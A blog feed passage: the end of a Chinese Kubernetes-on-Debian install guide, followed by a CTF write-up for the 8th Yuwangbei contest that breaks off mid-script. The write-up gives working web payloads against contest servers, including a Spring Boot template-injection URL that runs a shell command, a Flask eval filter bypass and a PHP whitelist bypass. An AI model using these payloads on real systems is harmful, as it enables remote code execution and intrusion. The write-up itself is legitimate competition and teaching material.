privileged_without_host_devices = false runtime_engine = "" runtime_path = "" runtime_root = "" runtime_type = "" [plugins."io.containerd.grpc.v1.cri".containerd.default_runtime.options] [plugins."io.containerd.grpc.v1.cri".containerd.runtimes] [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc] base_runtime_spec = "" cni_conf_dir = "" cni_max_conf_num = 0 container_annotations = [] pod_annotations = [] privileged_without_host_devices = false runtime_engine = "" runtime_path = "" runtime_root = "" runtime_type = "io.containerd.runc.v2" [plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc.options] BinaryName = "" CriuImagePath = "" CriuPath = "" CriuWorkPath = "" IoGid = 0 IoUid = 0 NoNewKeyring = false NoPivotRoot = false Root = "" ShimCgroup = "" SystemdCgroup = true [plugins."io.containerd.grpc.v1.cri".containerd.untrusted_workload_runtime] base_runtime_spec = "" cni_conf_dir = "" cni_max_conf_num = 0 container_annotations = [] pod_annotations = [] privileged_without_host_devices = false runtime_engine = "" runtime_path = "" runtime_root = "" runtime_type = "" [plugins."io.containerd.grpc.v1.cri".containerd.untrusted_workload_runtime.options] [plugins."io.containerd.grpc.v1.cri".image_decryption] key_model = "node" [plugins."io.containerd.grpc.v1.cri".registry] config_path = "" [plugins."io.containerd.grpc.v1.cri".registry.auths] [plugins."io.containerd.grpc.v1.cri".registry.configs] [plugins."io.containerd.grpc.v1.cri".registry.headers] [plugins."io.containerd.grpc.v1.cri".registry.mirrors] [plugins."io.containerd.grpc.v1.cri".x509_key_pair_streaming] tls_cert_file = "" tls_key_file = "" [plugins."io.containerd.internal.v1.opt"] path = "/opt/containerd" [plugins."io.containerd.internal.v1.restart"] interval = "10s" [plugins."io.containerd.metadata.v1.bolt"] content_sharing_policy = "shared" [plugins."io.containerd.monitor.v1.cgroups"] no_prometheus = false [plugins."io.containerd.runtime.v1.linux"] no_shim = false runtime = "runc" runtime_root = "" shim = "containerd-shim" shim_debug = false [plugins."io.containerd.runtime.v2.task"] platforms = ["linux/amd64"] sched_core = false [plugins."io.containerd.service.v1.diff-service"] default = ["walking"] [plugins."io.containerd.service.v1.tasks-service"] rdt_config_file = "" [plugins."io.containerd.snapshotter.v1.aufs"] root_path = "" [plugins."io.containerd.snapshotter.v1.btrfs"] root_path = "" [plugins."io.containerd.snapshotter.v1.devmapper"] async_remove = false base_image_size = "" discard_blocks = false fs_options = "" fs_type = "" pool_name = "" root_path = "" [plugins."io.containerd.snapshotter.v1.native"] root_path = "" [plugins."io.containerd.snapshotter.v1.overlayfs"] root_path = "" upperdir_label = false [plugins."io.containerd.snapshotter.v1.zfs"] root_path = "" [proxy_plugins] [stream_processors] [stream_processors."io.containerd.ocicrypt.decoder.v1.tar"] accepts = ["application/vnd.oci.image.layer.v1.tar+encrypted"] args = ["--decryption-keys-path", "/etc/containerd/ocicrypt/keys"] env = ["OCICRYPT_KEYPROVIDER_CONFIG=/etc/containerd/ocicrypt/ocicrypt_keyprovider.conf"] path = "ctd-decoder" returns = "application/vnd.oci.image.layer.v1.tar" [stream_processors."io.containerd.ocicrypt.decoder.v1.tar.gzip"] accepts = ["application/vnd.oci.image.layer.v1.tar+gzip+encrypted"] args = ["--decryption-keys-path", "/etc/containerd/ocicrypt/keys"] env = ["OCICRYPT_KEYPROVIDER_CONFIG=/etc/containerd/ocicrypt/ocicrypt_keyprovider.conf"] path = "ctd-decoder" returns = "application/vnd.oci.image.layer.v1.tar+gzip" [timeouts] "io.containerd.timeout.bolt.open" = "0s" "io.containerd.timeout.shim.cleanup" = "5s" "io.containerd.timeout.shim.load" = "5s" "io.containerd.timeout.shim.shutdown" = "3s" "io.containerd.timeout.task.state" = "2s" [ttrpc] address = "" gid = 0 uid = 0 </code></pre> <p>重启 containerd 服务</p> <pre><code>systemctl restart containerd systemctl enable containerd </code></pre> <p>添加Kubernetes GPG 密钥</p> <pre><code>apt install -y apt-transport-https ca-certificates curl gpg curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.32/deb/Release.key | gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg chmod 644 /etc/apt/keyrings/kubernetes-apt-keyring.gpg </code></pre> <p>添加 Kubernetes apt 仓库</p> <pre><code>echo 'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.32/deb/ /' | tee /etc/apt/sources.list.d/kubernetes.list </code></pre> <p>更新apt源 安装 kubeadm, kubelet, kubectl 并禁止更新</p> <pre><code>apt update &amp;&amp; \ apt install -y kubelet kubectl kubeadm &amp;&amp; \ apt-mark hold kubelet kubeadm kubectl </code></pre> <p>验证安装</p> <pre><code>root@debian:~# kubectl version Client Version: v1.32.5 Kustomize Version: v5.5.0 The connection to the server localhost:8080 was refused - did you specify the right host or port? root@debian:~# kubelet version E0601 12:25:40.197825 18045 run.go:72] "command failed" err="unknown command version" root@debian:~# kubeadm version kubeadm version: &amp;version.Info{Major:"1", Minor:"32", GitVersion:"v1.32.5", GitCommit:"9894294ef13a5b32803e3ca2c0d620a088cc84d1", GitTreeState:"clean", BuildDate:"2025-05-15T09:10:46Z", GoVersion:"go1.23.8", Compiler:"gc", Platform:"linux/amd64"} </code></pre> <p>生成初始化节点配置文件</p> <pre><code>kubeadm config print init-defaults &gt; kubeadm-config.yaml </code></pre> <p>编辑配置</p> <pre><code>nano kubeadm-config.yaml </code></pre> <p>将advertiseAddress: 1.2.3.4 修改为 advertiseAddress: 192.168.xxx.70 (修改为你的master节点ip地址)<br /> 将nodeRegistration 中的 name 修改为你的master 节点的主机名<br /> 在networking 中添加 podSubnet: 10.244.0.0/16<br /> 将imageRepository: registry.k8s.io 修改为imageRepository: registry.aliyuncs.com/google_containers</p> <pre><code>#kubeadm-config.yaml apiVersion: kubeadm.k8s.io/v1beta4 bootstrapTokens: - groups: - system:bootstrappers:kubeadm:default-node-token token: abcdef.0123456789abcdef ttl: 24h0m0s usages: - signing - authentication kind: InitConfiguration localAPIEndpoint: advertiseAddress: 192.168.xxx.70 bindPort: 6443 nodeRegistration: criSocket: unix:///var/run/containerd/containerd.sock imagePullPolicy: IfNotPresent imagePullSerial: true name: debain-master taints: null timeouts: controlPlaneComponentHealthCheck: 4m0s discovery: 5m0s etcdAPICall: 2m0s kubeletHealthCheck: 4m0s kubernetesAPICall: 1m0s tlsBootstrap: 5m0s upgradeManifests: 5m0s --- apiServer: {} apiVersion: kubeadm.k8s.io/v1beta4 caCertificateValidityPeriod: 87600h0m0s certificateValidityPeriod: 8760h0m0s certificatesDir: /etc/kubernetes/pki clusterName: kubernetes controllerManager: {} dns: {} encryptionAlgorithm: RSA-2048 etcd: local: dataDir: /var/lib/etcd imageRepository: registry.aliyuncs.com/google_containers kind: ClusterConfiguration kubernetesVersion: 1.32.0 networking: dnsDomain: cluster.local serviceSubnet: 10.96.0.0/12 podSubnet: 10.244.0.0/16 proxy: {} scheduler: {} </code></pre> <p>初始化节点</p> <pre><code>kubeadm init --config kubeadm-config.yaml --upload-certs --v=9 </code></pre> <p>初始化成功以后运行</p> <pre><code> mkdir -p $HOME/.kube sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config sudo chown $(id -u):$(id -g) $HOME/.kube/config </code></pre> <p>安装Calico</p> <pre><code>kubectl create -f https://raw.githubusercontent.com/projectcalico/calico/v3.30.1/manifests/tigera-operator.yaml wget https://github.moeyy.xyz/https://raw.githubusercontent.com/projectcalico/calico/v3.30.1/manifests/custom-resources.yaml </code></pre> <p>修改custom-resources.yaml</p> <pre><code> nano custom-resources.yaml </code></pre> <p>将cidr 修改为在kubeadm-config.yaml 中定义的 podSubnet: 10.244.0.0/16 -&gt; cidr: 10.244.0.0/16/16<br /> 在spec 中添加镜像registry: docker.m.daocloud.io</p> <pre><code>#custom-resources.yaml # This section includes base Calico installation configuration. # For more information, see: https://docs.tigera.io/calico/latest/reference/installation/api#operator.tigera.io/v1.Installation apiVersion: operator.tigera.io/v1 kind: Installation metadata: name: default spec: # Configures Calico networking. registry: docker.m.daocloud.io # &lt;-- 添加或修改此行! calicoNetwork: ipPools: - name: default-ipv4-ippool blockSize: 26 cidr: 10.244.0.0/16 encapsulation: VXLANCrossSubnet natOutgoing: Enabled nodeSelector: all() --- # This section configures the Calico API server. # For more information, see: https://docs.tigera.io/calico/latest/reference/installation/api#operator.tigera.io/v1.APIServer apiVersion: operator.tigera.io/v1 kind: APIServer metadata: name: default spec: {} --- # Configures the Calico Goldmane flow aggregator. apiVersion: operator.tigera.io/v1 kind: Goldmane metadata: name: default --- # Configures the Calico Whisker observability UI. apiVersion: operator.tigera.io/v1 kind: Whisker metadata: name: default </code></pre> <p>apply</p> <pre><code> kubectl create -f custom-resources.yaml Every 2.0s: kubectl get pods -n calico-system NAME READY STATUS RESTARTS AGE calico-kube-controllers-77f646f8d9-6dlkw 1/1 Running 0 4m20s calico-node-5n2cp 1/1 Running 0 4m23s calico-typha-b6c4c4db5-lmkc6 1/1 Running 0 4m25s csi-node-driver-cklfv 2/2 Running 0 4m22s goldmane-795ddb994b-vssfw 1/1 Running 0 4m26s whisker-7cc794bddb-dt4ms 2/2 Running 0 2m44s </code></pre> <p>可用性验证</p> <pre><code>root@debain-master:~# kubectl get svc -n kube-system NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE kube-dns ClusterIP 10.96.0.10 &lt;none&gt; 53/UDP,53/TCP,9153/TCP 58m root@debain-master:~# dig -t a www.bilibili.com @10.96.0.10 ; &lt;&lt;&gt;&gt; DiG 9.18.33-1~deb12u2-Debian &lt;&lt;&gt;&gt; -t a www.bilibili.com @10.96.0.10 ;; global options: +cmd ;; Got answer: ;; -&gt;&gt;HEADER&lt;&lt;- opcode: QUERY, status: NOERROR, id: 16904 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 1232 ; COOKIE: 4138133d6f05ec22 (echoed) ;; QUESTION SECTION: ;www.bilibili.com. IN A ;; ANSWER SECTION: www.bilibili.com. 30 IN A 111.6.167.135 www.bilibili.com. 30 IN A 111.6.167.136 www.bilibili.com. 30 IN A 111.6.167.134 www.bilibili.com. 30 IN A 111.6.167.137 ;; Query time: 0 msec ;; SERVER: 10.96.0.10#53(10.96.0.10) (UDP) ;; WHEN: Sun Jun 01 14:02:24 CST 2025 ;; MSG SIZE rcvd: 185 </code></pre> 第八届御网杯信息安全大赛线上赛wphttps://blog.fiveqm.com/archives/380/https://blog.fiveqm.com/archives/380/Web input_data 提示是通过svn取源码,在prinstine目录下找到了flag,我交的时候flag是一串数字,复现的时候就变成了一串uuid Web admin 用dirsearch扫到了/;/login 和/;/admin 随便输点东西触发报错页面发现使用的是java的web框架,...Mon, 21 Oct 2024 09:23:50 GMT<p><strong>Web input_data</strong></p> <p>提示是通过svn取源码,在prinstine目录下找到了flag,我交的时候flag是一串数字,复现的时候就变成了一串uuid</p> <p><img src="/images/20241021_1729501684-image.png" alt="" /> <img src="/images/20241021_1729501704-image.png" alt="" /> <img src="/images/20241021_1729501737-image.png" alt="" /></p> <p><strong>Web admin</strong></p> <p><img src="/images/20241021_1729501752-image.png" alt="" /></p> <p>用dirsearch扫到了/;/login 和/;/admin</p> <p><img src="/images/20241021_1729501764-image.png" alt="" /> <img src="/images/20241021_1729501774-image.png" alt="" /> <img src="/images/20241021_1729501781-image.png" alt="" /></p> <p>随便输点东西触发报错页面发现使用的是java的web框架,使用漏扫工具扫描发现存在spring boot的ssti漏洞</p> <p>构造传参得到flag</p> <p><code>http://101.200.58.4:3333/;/admin/?path=__%24%7Bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat%20/flag%22).getInputStream()).next()%7D__%3A%3A.114514</code></p> <p><img src="/images/20241021_1729501809-image.png" alt="" /></p> <p>flag{d2716715-7b0b-4a9e-afc5-e54962a4d4c4}</p> <p><strong>Web flask</strong></p> <p>附件是flask框架的源码</p> <p><img src="/images/20241021_1729501816-image.png" alt="" /></p> <p>代码审计后发现ewalme可以直接执行文件读取命令,但是过滤了很多的字符和符号,只保留了小写的abc。</p> <p>使用python的格式化字符串,利用%c占位符将ascii码转为字符拼接成/flag.php 读取flag</p> <p><a href="http://101.200.58.4:1111/?evalme=%27%25c%25c%25c%25c%25c%27%25(47,102,108,97,103)"><code>http://101.200.58.4:1111/?evalme=%27%c%c%c%c%c%27%(47,102,108,97,103)</code></a></p> <p><img src="/images/20241021_1729501832-image.png" alt="" /></p> <p><strong>Web 如此多的FLAG</strong></p> <p><img src="/images/20241021_1729501862-image.png" alt="" /></p> <p>点击登录进入登录页面 在title标签里发现了提示/F1aaj.php</p> <p><img src="/images/20241021_1729501869-image.png" alt="" /> <img src="/images/20241021_1729501877-image.png" alt="" /></p> <p>得到了flag{Where_is_ur_flag} 看着不像flag,提交之后发现确实不是flag,继续寻找线索</p> <p>在cookie里发现了提示flag=%2FFLLL4g.php %2F是/</p> <p><img src="/images/20241021_1729501883-image.png" alt="" /></p> <p>进入FLLL4g.php得到</p> <p><img src="/images/20241021_1729501893-image.png" alt="" /></p> <p>需要传递X Y Z 三个参数 前两个参数简单,X&gt;9999即可,Y=一个解码前后都是0e开头的MD5值即可,Z有点意思,长度不大于60,过滤了$blacklist = [' ', ''', '"', '`', '\[', '\]', '\{', '}', '\t', '\r', '\n'];</p> <p>函数只能使用$security = ['abs', 'base_convert', 'cos', 'dechex', 'exp', 'f1ag', 'getrandmax', 'hexdec', 'is_nan', 'log', 'max', 'octdec', 'pi', 'sin', 'tan'];中的</p> <p>让我想到了攻防世界上的一道差不多的题<a href="https://www.cnblogs.com/zhengna/p/13964630.html">攻防世界-web-love_math(base_convert进制转换绕过白名单和长度限制) - zhengna - 博客园 (cnblogs.com)</a></p> <p>直接构造url <code>[http://101.200.58.4:20005/FLLL4g,php?X=99999a&amp;Y=0e12848383088Z=base_convert(1751504350,10,36)(base_convert(784,10,36](&lt;http://101.200.58.4:20005/FLLL4g,php?X=99999a&amp;Y=0e12848383088Z=base_convert\(1751504350,10,36\)\(base_convert\(784,10,36&gt;))</code></p> <p><img src="/images/20241021_1729501913-image.png" alt="" /></p> <p>访问 /FFLLLLLLLLLLLaGGGGG.php 得到flag</p> <p><img src="/images/20241021_1729501936-image.png" alt="" /></p> <p><strong>Crypto 不小心</strong></p> <p><img src="/images/20241021_1729501965-image.png" alt="" /></p> <p>这道题是DASCTF的原题</p> <p><a href="https://blog.csdn.net/weixin_52640415/article/details/126627810">https://blog.csdn.net/weixin_52640415/article/details/126627810</a></p> <p>flag{78ada113e709fdf12a5aa4aa5dd62e33}</p> <p><strong>Crypto justmatch</strong></p> <p>先使用sagematch 解出前半部分的flag,再用RSA解出后半部分的flag</p> <pre><code>from sage.symbolic.relation import solve from Crypto.Util.number import bytes_to_long, long_to_bytes from sage.all import var, PolynomialRing, Zmod # 定义变量 x x = var('x') # 方程的 y 值列表 y_value = [3149069, 2271689, 2337632, 3068562, 67697, 2337632, 3068562, 67697, 2143547, 2543093, 1844472, 2206998, 67697, 1844472, 2686547, 2020317, 67697, 3149069, 2271689, 2081324, 67697, 2143547, 2543093, 1844472, 2206998, 67697, 2337632, 3068562, 67697, 2143547, 2543093, 1844472, 2206998, 3752378] # 初始化空字符串用于保存解出的 flag flag = "" # 遍历 y_value,求解每个 y 对应的方程 2*x^3 + 2*x^2 + 3*x + 17 = y for i in y_value: equation = 2 * x^3 + 2 * x^2 + 3 * x + 17 == i solutions = solve(equation, x) # 求解方程 # 取第3个解并转换为字符追加到 flag 中 flag += chr(solutions[2].rhs()) print(f"解码出的 flag: {flag}") # RSA 参数用于解密 n = 2260375559104345425590426977960386256287009777233277062625487017885931446911942921201492850167115455071935831283269948569220356763988762825230315520633702443866690239945242948370781975714325308306543337600783340792458991506685843729962897796956171467876531084194426101796617903015810156717396227079274786269217370618477266867389155551378798713259843750289765858717627925689021561352438080039804957145513478767641674644346609224034274906228784593435462413278410143 e = 3 # 公钥指数 c = 1683427726786225271109289808778075351906457081282891335272956455076290407290946927840180672315908981114229434899424882579823897506730018911375238394076293908946844135295984336122170362703361647325169444373502665686779049846717305377396296752361918921007897449738856962248716579014267597667341690453460130215215256776249910808564677407383996700090361822122676428069577517468851642648993930679875398568383201032360229083338487146673018350740571719960730053254352184 # 密文 # 初始化 PolynomialRing 环境,模数为 n R.&lt;x&gt; = PolynomialRing(Zmod(n)) # 遍历可能的 40 种情况,尝试找到合适的根 for i in range(40): # 计算高位的消息部分,将 flag 转换为字节串 mhigh = bytes_to_long(flag.encode() + b"\x00" * 32 + b"}") # 构造多项式 f(mhigh + x)^e - c f = (mhigh + x)^e - c # 使用 small_roots 方法找到可能的解 res = f.small_roots(X=256^i, beta=0.4, epsilon=0.05) # 如果找到了解 if res != []: print(f"找到解: {res}") # 计算最终的消息 m = mhigh + int(res[0]) # 将消息转换回字节并输出 print(f"解密后的消息: {long_to_bytes(m)}") </code></pre> <p>flag{0f5a1806d07f030767e113352727ea2d}</p> <p><strong>Crypto Base</strong></p> <p>👄👋🐹🐸👂👱🐯🐢👚👊🐬👨👌👢👅🐿👊🐩👅👆👈👤🐧🐢👁👡🐯👰👂🐩👛👂👂👋👯🐺👋🐩👄👤👉🐾👄👭👃👋👀🐢👁👠👯🐻👀👌🐽👩👐👍👫🐾👇👥🐼👭👌👌👣🐺👊🐾🐬👘👌👢👁👄👌👍👉👅👄👠👫👦👊👌👅🐺👅👍🐬👙👘🐧👍👞👂🐪👍🐼👉👰👐🐭👏👊👚🐧👏🐨👦🐯👆👋🐰👬👂🐪👍👈👈👢👟👭👃🐩👍👀👁🐼👑👙👋👋👉🐺👅👋🐯🐨👇🐼👁👈👁👠🐬🐼👐👱🐽👁👃👱🐫👤👃👎👅👂👆🐿🐸👧👋🐨👀🐦👅🐧👪👤👍👡👄👢👉🐺🐬🐾👈👢👯👉👍🐼🐧🐪👙👣🐸👟👑🐧👞👡👃👌👀👣👉👎🐸👪👃🐼👟🐿👁👡👦👧👍👡🐼👮👈🐺👪🐦👇👱👛👃👁👣👑🐺👊🐾🐯👭👑👌👁👫👇👠👄🐢👄👠👫👦👎🐼👢🐯👈👢🐯👮👁👢👍👞👃👎👈👰👈👎🐯👭👑👠🐯🐯👁👤👄👮👚👋🐰👊👑👣👣👣👄👰👉🐽👃🐨🐰🐺👋🐽👀🐮👏👱👅🐼👂🐼🐨👑👇🐼👁👅👉👠🐨🐾👀👋👍👢👌👌👚👤👆👣🐧👥👈👎👫👡👇👱🐧👭👄👌🐬👘👀👋👛👨👊🐩🐹🐽👄🐺🐰🐨👅🐻👀🐧👈👡👌🐦👅👌👅👠👊🐿👀🐪👉👠👑🐾👌👋👐🐢👁👠🐨👡👊👡🐼👮👇👥🐽👰👇🐨👁👣👍🐼👛🐺👊🐿🐽🐻👇🐼👁👄👌👍👉👅👉🐨👢👮👄👢👄🐩👚🐼👉👦👛🐼👍👞👂🐪👍🐼👈👎🐯👯👄👍👟🐹👘🐩👄🐦👇👊🐯👯👋👣👦👟👈👢👟👯👈👱👯🐺👙👋🐨🐨👇👋👉🐺👅👋🐯🐨👈🐩👁👀👚👡👛🐾👁👢👚👧👉👊👯🐹👑👍🐨🐹👈👠🐰👅👂👊🐯🐦👌👤👐👭👍🐧👁👀👚🐺👍👱👈👤🐧🐢👀👱🐫👰👂🐩👐👧👍👋🐽🐾👘👣👮👠👉👎🐸👩👎👡👫🐺👄🐩🐯👣👏👡🐼👮👇👥🐽👰👇🐩🐫👩👄🐽👌👱👁🐼👌👭👏🐧👁👫👇👠👄🐢👉🐨👢👱👆👋👛🐻👐👢👢🐰👘🐼👍👞👂🐨🐼🐫👆👤👢👭👘👢👀🐯👁👤👄👮👚👊🐧🐫👁👢👈👠👈👢👟👮👃👱👅🐺👌👠👁👭👇👊👯🐧👏👌👅🐽👅🐽🐫👮👃👍👯🐽👐🐺👮👪👊🐼👚👤👆🐼👮🐦👄👋🐹🐸👂👱🐯🐢👚👊🐬👨👌👡👛👨👊🐩🐹🐽👃🐩👮🐨👐👤👈👰👂🐩👟👐👊👋🐼👩👌👋👛🐿👉👎🐸👩👌👋👞👪👈👎👚👦👘👡👉👝👎👡👮🐬👇🐨👁👤👎👎👌👱👁🐼👁👋👅👌👀👯👅👢👫👄👅🐩🐬👈👀👎👚👱👂👰👅👊👃🐼👍👞👂🐪👍🐼👆👰🐨👩👋👎🐹🐹👘🐩👁👧👘🐻🐯🐪👊👍👫👃👈👢👟👮👈👠👅🐿👎🐽👪👟👙👰🐰👪👐👊👯👑👄👊👫👉👋🐧🐯🐪👑👞🐴🐴</p> <p>先解base100</p> <p>MTBAKz8+cS5qUkNHS2NOQm0+Jj8yK2dKKTxCT2MmRGMvLTI+JixDIUFrYVtGPnEvUUlCSG5aUkJMUVRNMitoSUNCNV5ba0VgK3VERyY6XSc0X1o8OT9uK3VQQkhvL2VIJEZbTTRCNT81PEJQJi5EYzFJLz4mLWNKOHApT1I/N0smVjMkRC5GQkxRVE03blAhZ0gjLUIlRWAsLEhHJjopVjEwQCs/PzdLJlZCSG8vZUJtPiM+MitoWEk8Qk8wJkVgLWQyQW8vZi88JmMwcT9SZlllMyRFL19CTFI7XzNEKE1ZPEJNRi1GITVkUUcmOl0nQWtjPz0vMU5aITdqS2BFMC91NDI0QjU/NUNiSHI3RiZGUTY+Ji1jSjEwPnFyP1JlVEdCSHFDPEJMUVRNR1kwMkM2cERodEVgK3VEQW8xMVhBa2M/PS8xTlohQkhxQzxCbT11PTRCNT81Q2JIcjdGJkcpRSxBZV1BQi9NKS8/UmYvV0JIcCVzQm0+Iz4yK2YpVTFGalwiRWArWjtCM28lXjEwPnFyP24rMFUzJEUvX0JtPiM+R1kzOTdDYkk9aEVgK1E4OmkvakI8JmMwcS04JkQiQkhwLzNCUiJvPSx0XUNFNF4wLVxFYCwsSEcmOEw/MTBAKz8+cS5qUjdqS2BFL2w1YmQyK2hYSTErUTdHRWArUTgsQWcoajRfWjw5P1JmWWUzJEJTNUIxNktMN25QIWczKyNSLEVgK3VEOy1rTWBBa2JpaD83SVtLQkhwQiNHWFshby9sYSxZMStRT083Zg==</p> <p>再解base64</p> <p>[10@+?&gt;q.jRCGKcNBm&gt;&amp;?2+gJ)&lt;BOc&amp;Dc/-2&gt;&amp;,C!Aka[F&gt;q/QIBHnZRBLQTM2+hICB5^[kE<code>+uDG&amp;:]'4_Z&lt;9?n+uPBHo/eH$F[M4B5?5&lt;BP&amp;.Dc1I/&gt;&amp;-cJ8p)OR?7K&amp;V3$D.FBLQTM7nP!gH#-B%E</code>,,HG&amp;:)V10@+??7K&amp;VBHo/eBm&gt;#&gt;2+hXI&lt;BO0&amp;E<code>-d2Ao/f/&lt;&amp;c0q?RfYe3$E/_BLR;_3D(MY&lt;BMF-F!5dQG&amp;:]'Akc?=/1NZ!7jK</code>E0/u424B5?5CbHr7F&amp;FQ6&gt;&amp;-cJ10&gt;qr?ReTGBHqC&lt;BLQTMGY02C6pDhtE<code>+uDAo11XAkc?=/1NZ!BHqC&lt;Bm=u=4B5?5CbHr7F&amp;G)E,Ae]AB/M)/?Rf/WBHp%sBm&gt;#&gt;2+f)U1Fj\"E</code>+Z;B3o%^10&gt;qr?n+0U3$E/_Bm&gt;#&gt;GY397CbI=hE<code>+Q8:i/jB&lt;&amp;c0q-8&amp;D"BHp/3BR"o=,t]CE4^0-\E</code>,,HG&amp;8L?10@+?&gt;q.jR7jK<code>E/l5bd2+hXI1+Q7GE</code>+Q8,Ag(j4_Z&lt;9?RfYe3$BS5B16KL7nP!g3+#R,E<code>+uD;-kM</code>Akbih?7I[KBHpB#GX[!o/la,Y1+QOO7f](<a href="mailto:10@+?%3eq.jRCGKcNBm%3e&amp;?2+gJ%5C)%3cBOc&amp;Dc/-2%3e&amp;,C!Aka%5bF%3eq/QIBHnZRBLQTM2+hICB5%5e%5bkE%60+uDG&amp;:%5d'4_Z%3c9?n+uPBHo/eH$F%5bM4B5?5%3cBP&amp;.Dc1I/%3e&amp;-cJ8p%5C)OR?7K&amp;V3$D.FBLQTM7nP!gH#-B%25E%60,,HG&amp;:%5C)V10@+??7K&amp;VBHo/eBm">mailto:10@+?&gt;q.jRCGKcNBm&gt;&amp;?2+gJ\)&lt;BOc&amp;Dc/-2&gt;&amp;,C!Aka[F&gt;q/QIBHnZRBLQTM2+hICB5^[kE`+uDG&amp;:]'4_Z&lt;9?n+uPBHo/eH$F[M4B5?5&lt;BP&amp;.Dc1I/&gt;&amp;-cJ8p\)OR?7K&amp;V3$D.FBLQTM7nP!gH#-B%E`,,HG&amp;:\)V10@+??7K&amp;VBHo/eBm</a>&gt;)</p> <p>再解base85</p> <p>2XIJ]*9pk2n!ix}i5JJ&gt;U&lt;ceoR,xZk$kfM(I]*MSh#!/hEhk5Jf&lt;goRvrR;xvmbj=i(I<code>*PTh#/4yx{i&lt;UT.U&lt;keoRn3ZkKmJu(I^*XT8!QzhEhkGJ#&lt;ylRvrR?xvmQU2XIJ^*XTh#/4ix|i5Jk=U&lt;RvrRn3fm$kT8%I_*fT8!n!hE|i9J#&lt;U&lt;!Ys!xxvmbjfMWf,*9pG$/4/8@i&lt;UT.l/!YsR,xZkKm2X(I_*HTh#n!hEhkxJ#&lt;D?!YrR;xfmKmfMWf,*9ph#n!ix{i&lt;UT.l/!YsR;x#m$kg5(I_*XTh#H)ix|i5J#&lt;3+#*rR2xg^bj2X(I</code>*9p8!n!ix|ixJz.l/,*rR/xPmKmT8%I&amp;.XTh#K;hx|i%J#&lt;=[#*rR?xvm$k2XIJ]*9pG$/4.P[i5Jk=2+RvrR/x#mKm=i([I_*fT8!%@gEhkGJ#&lt;8_RvrR;xQ^$kfMIJ^*1ph#QzxE|i.U#&lt;2+ZvG](&lt;mailto:I_*fT8!%25@gEhkGJ#&lt;8_RvrR;xQ^$kfMIJ^*1ph&gt;)</p> <p>再解base91</p> <p>chgdchg5clctclcxclc5cdc9chcdcdc9chctchglcdc9chclclcdclcpchchchgdchg5clg5chg9clcpchclcdcdchg9chg5chctclc9chghclchchclclcpclchchghchg5clcpcdclchcpchclcdc9clcdcdc9chglchg5chg5chctcdc9clchclcdchclchgdchcpcdclchclcdc9chghclcdchg5chctclcpchctclclchgpclclchgdclcBchgdchcpchgdclclcdc9chglchcdclg5chglchg5clctchctclctclchchgdchglchg9clcpcdchchcpclclclcpcdc9chg9chcxchclcdghcdghcdghcdghcdghcdgh</p> <p>再解base62</p> <p>4C4A575851324332474E32455356444C4A5A4B5645334B4A47524D544556544D4A563546453253324E4A4A47325453454C463545324D534A475647554F554C594C464C55324E435A4E4A574757544C4E4B5634465556324B48453D3D3D3D3D3D</p> <p>再解16进制,解base32,解base64得到flag</p> <p>flag{HNCTFb8cee34cf4f4633b90d1ac8b9d2e1eb}</p> <p>Crypto easy_crypto1</p> <p>p:因为q是getPrime(16) * p + 38219 的下一个质数,可以利用模数n和这个关系,通过一些因数分解解出符合要求的q</p> <p>求出p和q,那么n也就可以分解出来,进而求解出 E1的私钥d。用 d 对密文c进行解密,可能得到E1。通过 n1和 n2分解 P,利用P和Q1,Q2的乘积,求解flag</p> <p>三个模数 ns 是独立的,但指数 E2 较小,有可能存在“低加密指数攻击”的情况,通过用中国剩余定理解出 E2 的解密密钥</p> <p>qqq 是通过 qq 位移得到的,这个操作可能暗示 qq 的低位信息已经丢失,但高位信息还存在,尝试从高位还原 qq,并分解 nn。</p> <pre><code>from Crypto.Util.number import long_to_bytes import gmpy2 # 自定义中国剩余定理求解函数 def solve_crt(remainders, moduli): # 初始化 x = 0 和 模数乘积 N = 1 x = 0 N = 1 for mod in moduli: N *= mod # 逐个求解 for remainder, mod in zip(remainders, moduli): # 计算当前模数对 N 的余数部分的乘积 Ni Ni = N // mod # 计算 Ni 的逆元 (mod mod) inverse = gmpy2.invert(Ni, mod) # 累加求和 x += remainder * Ni * inverse # 返回最终结果对 N 取模 return x % N # 给定的参数 n1 = 21655617838358037895534605162358784326495251462447218485102155997156394132443891540203860915433559917314267455046844360743623050975083617915806922096697304603878134295964650430393375225792781804726292460923708890722827436552209016368047420993613497196059326374616217655625810171080545267058266278112647715784756433895809757917070401895613168910166812566545593405362953487807840539425383123369842741821260523005208479361484891762714749721683834754601596796707669718084343845276793153649005628590896279281956588607062999398889314240295073524688108299345609307659091936270255367762936542565961639163236594456862919813549 n2 = 24623016338698579967431781680200075706241014384066250660360949684385831604822817314457973559632215801205780786144608311361063622813017396858888436529116737754653067203843306015767091585697803364656624926853551997229897087731298797904208292585562517602132663331748784390752958757661484560335406769204491939879324079089140420467301773366050084810282369044622442784113688062220370531522036512803461607049619641336524486507388232280683726065679295742456158606213294533956580462863488082028563360006966912264908424680686577344549034033470952036766850596897062924137344079889301948258438680545785139118107899367307031396309 c1 = 2615722342860373905833491925692465899705229373785773622118746270300793647098821993550686581418882518204094299812033719020077509270290007615866572202192731169538843513634106977827187688709725198643481375562114294032637211892276591506759075653224150064709644522873824736707734614347484224826380423111005274801291329132431269949575630918992520949095837680436317128676927389692790957195674310219740918585437793016218702207192925330821165126647260859644876583452851011163136097317885847756944279214149072452930036614703451352331567857453770020626414948005358547089607480508274005888648569717750523094342973767148059329557 c2 = 6769301750070285366235237940904276375318319174100507184855293529277737253672792851212185236735819718282816927603167670154115730023644681563602020732801002035524276894497009910595468459369997765552682404281557968383413458466181053253824257764740656801662020120125474240770889092605770532420770257017137747744565202144183642972714927894809373657977142884508230107940618969817885214454558667008383628769508472963039551067432579488899853537410634175220583489733111861415444811663313479382343954977022383996370428051605169520337142916079300674356082855978456798812661535740008277913769809112114364617214398154457094899399 E1 = 377312346502536339265 E2 = 561236991551738188085 # 计算公因数 P P = 